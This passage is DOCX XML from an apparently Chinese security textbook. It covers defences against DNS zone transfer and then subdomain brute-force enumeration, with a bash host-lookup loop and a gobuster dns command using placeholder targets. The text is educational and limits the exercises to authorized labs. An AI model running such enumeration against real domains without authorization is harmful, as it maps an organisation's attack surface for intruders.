      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">252（即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AXFR）的数据包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁止未授权区域传送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在权威</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器软件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BIND、PowerDNS）的配置中，严格限制允许进行区域传送的源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址。BIND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow-transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项应仅包含已知的辅服务器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，默认为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段与拆分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS (Split DNS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将面向互联网的权威</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器与服务于内部员工的递归</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析器严格分离。外部服务器仅应包含对外公开服务的记录（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器）。任何内部主机名、管理接口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">都不应出现在外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的视图中。这种架构从根本上限制了区域传送一旦泄露所造成的影响范围。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TSIG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">认证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对于必须进行区域传送的环境，使用事务签名（TSIG）进行加密认证，确保请求和响应的完整性与来源真实性①。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:id="89" w:name="子域枚举与字典爆破"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子域枚举与字典爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当区域传送被正确禁用后，攻击者无法“一步到位”地获取所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，但仍可通过“穷举询问”的方式拼凑出目标的攻击面。这便是子域爆破的核心，其依赖的是对域名解析这一基本功能的滥用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：只要攻击者有足够的耐心和词汇量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[简化]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，他就可以通过穷举可能的子域名称前缀，并根据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的不同响应来判别一个子域是否存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术机理与判定逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子域爆破本质上是向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器发起海量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AAAA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录查询。对于每个猜测的子域全称，DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器会给出几种标准化的回应，攻击者据此进行判定①：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">子域存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：服务器返回一个或多个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AAAA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NOERROR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回码并携带应答。这是最直接的证据。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">子域不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (NXDOMAIN)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：服务器权威地声明该域名不存在。这是最明确的否定信号。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">记录不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (NODATA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这是需要经验区分的状况。服务器返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NOERROR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回码，但应答内容为空。这通常意味着子域本身作为一个节点是存在的，但并不存在所查询的特定记录类型（例如，可能缺少</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，但存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CNAME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，或是一个用于进一步委派的空节点）。攻击者常常会结合其他记录类型（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CNAME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）再次确认。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">通配符解析干扰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这是防御者最常用的技术之一。无论查询任何不存在的子域，服务器都返回一个统一的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址。如果攻击者不对结果进行去重和指纹识别，将会被海量虚假的“存在”响应淹没。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操：从手动到自动化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节在攻防理论基础上介绍工具使用。读者应在授权实验环境内进行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">环境依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：需要在实验环境中自行搭建一个带有大量子域记录的私有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根域，或使用授权靶场提供的目标。以下所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及字典文件均为占位符②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">穷举法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">脚本示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是一个最基础的爆破逻辑，揭示了工具背后的原理，但不适合高强度实战。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> www mail ftp admin dev test portal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">do</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RESOLVER_IP</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"not found"</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"NXDOMAIN"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该脚本遍历一个硬编码的子域列表，通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令逐一查询，并过滤掉明确的否定应答。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对于存在的子域，会打印出其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">使用专用子域枚举工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在实际安全评估中，攻击者会使用功能更强大的工具，它们通常内置了复杂的字典，并支持并发、递归枚举、多种记录类型探测以及通配符过滤。以下是两个代表性工具的通用语法示例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：作为一个模块化的暴力破解工具，其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式常用于此目的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH_TO_WORDLIST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RESOLVER_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定目标域名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定子域字典路径，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SecLists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">subdomains-top1million-5000.txt</w:t>
      </w:r>
      <w:r>
